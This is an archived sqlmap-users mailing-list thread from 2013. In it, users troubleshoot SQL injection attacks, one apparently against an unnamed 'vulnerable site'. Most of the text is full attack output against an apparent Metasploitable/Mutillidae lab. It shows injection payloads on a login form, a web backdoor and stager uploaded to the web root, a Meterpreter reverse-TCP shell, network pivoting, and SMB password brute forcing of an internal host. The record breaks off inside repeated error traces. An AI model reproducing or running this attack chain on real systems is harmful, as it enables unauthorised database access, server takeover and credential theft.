sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] SQLmap

[Chris O. <chr...@gm...>]

I'd imagine that if you want answers, you're going to have to give a little
more information than that.


On 29 October 2013 18:39, remi driessens <rem...@ho...> wrote:

> hi developers from sqlmap
>
> i have a problem with sqlmap everytime i do this on my vulnerable site it
> gives me all tested parameters apear to be not injectable. try to increase
> --level / --risk values to preform more tests...
>
> and if i do sql manualy i can get in the database of the website :s ive
> noticed this testing 'MySQL union query (NULL) - 1 to 10 collumns my
> website has 18 columns and the vulnerable column is 12 i thought maybe this
> is the problem ? i hope you can bring me some awnsers
>
>
> ------------------------------------------------------------------------------
> Android is increasing in popularity, but the open development platform that
> developers love is also attractive to malware creators. Download this white
> paper to learn more about secure code signing practices that can help keep
> Android apps secure.
> http://pubads.g.doubleclick.net/gampad/clk?id=65839951&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] SQLmap

[remi d. <rem...@ho...>]

hi developers from sqlmap 

i have a problem with sqlmap everytime i do this on my vulnerable site it gives me all tested parameters apear to be not injectable. try to increase --level / --risk values to preform more tests...

and if i do sql manualy i can get in the database of the website :s ive noticed this testing 'MySQL union query (NULL) - 1 to 10 collumns my website has 18 columns and the vulnerable column is 12 i thought maybe this is the problem ? i hope you can bring me some awnsers 
 		 	   		  

Re: [sqlmap-users] Direct connection to Oracle supported?

[Miroslav S. <mir...@gm...>]

Hi.

"Does sqlmap need a specifc version of these files?" - not really. It just
needs to be compatible with the current Python version.

Kind regards,
Miroslav Stampar


On Thu, Oct 24, 2013 at 4:55 PM, Brian Milliron <Br...@ec...>wrote:

> Thanks for the sample command and output.  It turns out there was a case
> sensitivity issue.  oracle:// vs Oracle://  Once I solved that, sqlmap
> began complaining about a missing cx_Oracle.py  The Kali installation it
> seems is missing the Oracle client and python libraries.  Does sqlmap
> need a specifc version of these files?
>
>
> > Hi.
> >
> > sqlmap supports it. Sample console output:
> >
> > $ python sqlmap.py -d "oracle://SYSTEM:testpass@192.168.5.27:1521/testdb
> "
> > -v 5 --banner
> >
> >     sqlmap/1.0-dev-8dac47f - automatic SQL injection and database
> takeover
> > tool
> >     http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> > mutual consent is illegal. It is the end user's responsibility to obey
> all
> > applicable local, state and federal laws. Developers assume no liability
> > and are not responsible for any misuse or damage caused by this program
> >
> > [*] starting at 20:15:37
> >
> > [20:15:37] [DEBUG] cleaning up configuration parameters
> > [20:15:37] [DEBUG] forcing timeout to 10 seconds
> > [20:15:37] [INFO] connection to oracle server 192.168.5.27:1521established
> > [20:15:37] [INFO] the back-end DBMS is Oracle
> > [20:15:37] [INFO] fetching banner
> > [20:15:37] [PAYLOAD] SELECT NVL(CAST(banner AS VARCHAR(4000)),' ') FROM
> > v$version WHERE ROWNUM=1
> > back-end DBMS: Oracle
> > banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 -
> > Prod'
> > [20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 closed
> >
> > [*] shutting down at 20:15:37
> >
> > Could you please check that you run the latest revision from the Github
> > repository and try to run it with -v 5? Strange thing with your case is
> > "sqlmap was not able to fingerprint..." while there is no fingerprinting
> in
> > sqlmap's direct mode (at least in HEAD revision).
> >
> > Kind regards,
> > Miroslav Stampar
>
>
>
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Direct connection to Oracle supported?

[Brian M. <Br...@EC...>]

Thanks for the sample command and output.  It turns out there was a case
sensitivity issue.  oracle:// vs Oracle://  Once I solved that, sqlmap
began complaining about a missing cx_Oracle.py  The Kali installation it
seems is missing the Oracle client and python libraries.  Does sqlmap
need a specifc version of these files?


> Hi.
> 
> sqlmap supports it. Sample console output:
> 
> $ python sqlmap.py -d "oracle://SYSTEM:testpass@192.168.5.27:1521/testdb"
> -v 5 --banner
> 
>     sqlmap/1.0-dev-8dac47f - automatic SQL injection and database takeover
> tool
>     http://sqlmap.org
> 
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
> 
> [*] starting at 20:15:37
> 
> [20:15:37] [DEBUG] cleaning up configuration parameters
> [20:15:37] [DEBUG] forcing timeout to 10 seconds
> [20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 established
> [20:15:37] [INFO] the back-end DBMS is Oracle
> [20:15:37] [INFO] fetching banner
> [20:15:37] [PAYLOAD] SELECT NVL(CAST(banner AS VARCHAR(4000)),' ') FROM
> v$version WHERE ROWNUM=1
> back-end DBMS: Oracle
> banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 -
> Prod'
> [20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 closed
> 
> [*] shutting down at 20:15:37
> 
> Could you please check that you run the latest revision from the Github
> repository and try to run it with -v 5? Strange thing with your case is
> "sqlmap was not able to fingerprint..." while there is no fingerprinting in
> sqlmap's direct mode (at least in HEAD revision).
> 
> Kind regards,
> Miroslav Stampar

[sqlmap-users] Pivoting issues with sqlmap meterpreter session

[Soner T. <son...@ho...>]

Hi All,

I know that the meterpreter option in sqlmap is beta (as reported in parantheses during the payload selection). So is it expected that I am having problems with pivoting using the meterpreter session opened by sqlmap? Simple command execution on the meterpreter session seems to work fine though.

For example, I can successfully open a meterpreter session using Metasploitable/Mutillidae login page. Then, I background the session and add a route to the target network using a command like the following on the metasploit command prompt:

route add 10.0.0.0 255.255.255.0 1

which seems to be successful.

After that, I try to run smb_login scanner on a computer on the target network, such as 10.0.0.3. But when I listen to the traffic on 10.0.0.3, I can see only a few packets arriving to the machine. Otherwise, a similar smb_login run on metasploit without pivoting produces hundreds of packets, i.e. smb login attempts.

And if I try to run another scanner (such as the tcp port scanner) immediately afterwards, the meterpreter session dies.

Please see below the output I have captured of the example above (sorry for the escape sequences for coloring). Based on the SSL errors at the end, I believe that this issue may be related with SSL.

Does anybody see any mistake I am making (I am dealing with this issue for at least a week now)? Or is this a known issue (but I couldn't see a similar report on the issue tracker)? If not, and if somebody else can confirm too, I can submit a bug report as well.

As you can see below my software versions are:

sqlmap/1.0-dev, which is actually 0.9-3340 obtained from github
metasploit v4.7.2-1

I have tried with the original sqlmap and metasploit versions already installed on Kali 1.0 and Backtrack 5, and misc github versions of sqlmap too. They behave worse, and the latest versions I use can at least sustain the meterpreter session for a while before it dies. Any help would be appreciated.

TIA,


    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:12:27

[17:12:27] [INFO] testing connection to the target URL
[17:12:28] [INFO] heuristics detected web page charset 'ISO-8859-2'
[17:12:28] [INFO] searching for forms
 [#1] form:
POST http://192.168.2.149:80/mutillidae/index.php?page=login.php
POST data: username=&password=&login-php-submit-button=Login
do you want to test this form? [Y/n/q] 
> 
Edit POST data [default: username=&password=&login-php-submit-button=Login] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] [17:12:35] [INFO] resuming back-end DBMS 'mysql' 
[17:12:35] [INFO] using '/root/Desktop/sqlmapproject-sqlmap-9f21406/output/results-10232013_0512pm.csv' as the CSV results file in multiple targets mode
[17:12:36] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: username=-8398' OR (6065=6065)#&password=&login-php-submit-button=Login

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=eUFX' AND (SELECT 8694 FROM(SELECT COUNT(*),CONCAT(0x7171656271,(SELECT (CASE WHEN (8694=8694) THEN 1 ELSE 0 END)),0x71706f6e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BIzF'='BIzF&password=&login-php-submit-button=Login

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: username=eUFX' UNION ALL SELECT NULL,CONCAT(0x7171656271,0x6f4c455066514c626261,0x71706f6e71),NULL,NULL,NULL#&password=&login-php-submit-button=Login

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=eUFX' AND 1483=BENCHMARK(5000000,MD5(0x63724c53)) AND 'pgsc'='pgsc&password=&login-php-submit-button=Login
---
 do you want to exploit this SQL injection? [Y/n] [17:12:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[17:12:37] [INFO] fingerprinting the back-end DBMS operating system
[17:12:37] [INFO] the back-end DBMS operating system is Linux
[17:12:37] [INFO] going to use a web backdoor to establish the tunnel
 which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> [17:12:38] [INFO] retrieved the web server document root: '/var/www'
[17:12:38] [INFO] retrieved web server full paths: '/var/www/mutillidae/index.php, /var/www/mutillidae/process'
[17:12:38] [INFO] trying to upload the file stager on '/var/www' via LIMIT INTO OUTFILE technique
[17:12:39] [WARNING] reflective value(s) found and filtering out
[17:12:39] [WARNING] unable to upload the file stager on '/var/www'
[17:12:39] [INFO] trying to upload the file stager on '/var/www' via UNION technique
[17:12:39] [WARNING] expect junk characters inside the file as a leftover from UNION query
[17:12:40] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[17:12:40] [INFO] trying to upload the file stager on '/var/www/mutillidae' via LIMIT INTO OUTFILE technique
[17:12:42] [INFO] heuristics detected web page charset 'ascii'
[17:12:42] [INFO] the file stager has been successfully uploaded on '/var/www/mutillidae' - http://192.168.2.149:80/mutillidae/tmpuguhd.php
[17:12:42] [INFO] the backdoor has been successfully uploaded on '/var/www/mutillidae' - http://192.168.2.149:80/mutillidae/tmpbbjkl.php
[17:12:42] [INFO] creating Metasploit Framework multi-stage shellcode 
 which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Bind TCP: Listen on the database host for a connection
> 
what is the local address? [192.168.2.221] 
which local port number do you want to use? [42294] 
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 
[17:12:50] [INFO] creation in progress .................. done
 what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> [17:13:10] [INFO] uploading shellcodeexec to '/tmp/tmpsejyxs'
[17:13:10] [INFO] shellcodeexec successfully uploaded
[17:13:10] [INFO] running Metasploit Framework command line interface locally, please wait..
[*] Initializing modules...
PAYLOAD => linux/x86/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 42294
LHOST => 192.168.2.221
[*] Started reverse handler on 192.168.2.221:42294 
[*] Starting the payload handler...
[17:13:31] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.2.149
[*] Meterpreter session 1 opened (192.168.2.221:42294 -> 192.168.2.149:19485) at 2013-10-23 17:13:35 +0300

meterpreter > [*] Backgrounding session 1...
msf exploit(handler) > Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             http://metasploit.pro


       =[ metasploit v4.7.2-1 [core:4.7 api:1.0]
+ -- --=[ 1211 exploits - 733 auxiliary - 202 post
+ -- --=[ 317 payloads - 30 encoders - 8 nops

msf exploit(handler) > [*] postgresql connected to msf3
msf exploit(handler) > 
Active sessions
===============

  Id  Type                   Information                                                          Connection
  --  ----                   -----------                                                          ----------
  1   meterpreter x86/linux  uid=33, gid=33, euid=33, egid=33, suid=33, sgid=33 @ metasploitable  192.168.2.221:42294 -> 192.168.2.149:19485 (10.0.0.2)

msf exploit(handler) > [*] Route added
msf exploit(handler) > 
Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.0.0           255.255.255.0      Session 1

msf exploit(handler) > msf auxiliary(smb_login) > 
Module options (auxiliary/scanner/smb/smb_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASS_FILE                          no        File containing passwords, one per line
   PRESERVE_DOMAINS  true             no        Respect a username that contains a domain name.
   RECORD_GUEST      false            no        Record guest-privileged random logins to the database
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             445              yes       Set the SMB service port
   SMBDomain                          no        SMB Domain
   SMBPass                            no        SMB Password
   SMBUser                            no        SMB Username
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(smb_login) > RHOSTS => 10.0.0.3
msf auxiliary(smb_login) > USER_FILE => /root/user
msf auxiliary(smb_login) > PASS_FILE => /root/pass
msf auxiliary(smb_login) > 
Module options (auxiliary/scanner/smb/smb_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASS_FILE         /root/pass       no        File containing passwords, one per line
   PRESERVE_DOMAINS  true             no        Respect a username that contains a domain name.
   RECORD_GUEST      false            no        Record guest-privileged random logins to the database
   RHOSTS            10.0.0.3         yes       The target address range or CIDR identifier
   RPORT             445              yes       Set the SMB service port
   SMBDomain                          no        SMB Domain
   SMBPass                            no        SMB Password
   SMBUser                            no        SMB Username
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE         /root/user       no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(smb_login) > 
[*] 10.0.0.3:445 SMB - Starting SMB login bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_login) > msf auxiliary(tcp) > 
Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) > RHOSTS => 10.0.0.3
msf auxiliary(tcp) > PORTS => 1-100
msf auxiliary(tcp) > THREADS => 10
msf auxiliary(tcp) > 
Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-100            yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       10.0.0.3         yes       The target address range or CIDR identifier
   THREADS      10               yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) > 
[-] 10.0.0.3:5 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[-] 10.0.0.3:6 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[-] 10.0.0.3:7 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[-] 10.0.0.3:8 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[-] 10.0.0.3:9 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[-] 10.0.0.3:1 exception OpenSSL::SSL::SSLError SSL_write:: bad write retry ["/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `syswrite'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:318:in `do_write'", "/opt/metasploit2/ruby/lib/ruby/1.9.1/openssl/buffering.rb:336:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/ssl_tcp.rb:151:in `write'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:157:in `block in send_packet'", "<internal:prelude>:10:in `synchronize'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:155:in `send_packet'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:212:in `send_packet_wait_response'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:188:in `send_request'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:92:in `open'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:103:in `create_tcp_client_channel'", "/opt/metasploit2/apps/pro/msf3/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:74:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:449:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket.rb:47:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:37:in `create_param'", "/opt/metasploit2/apps/pro/msf3/lib/rex/socket/tcp.rb:28:in `create'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/exploit/tcp.rb:100:in `connect'", "/opt/metasploit2/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb:59:in `block (2 levels) in run_host'", "/opt/metasploit2/apps/pro/msf3/lib/msf/core/thread_manager.rb:100:in `call'", 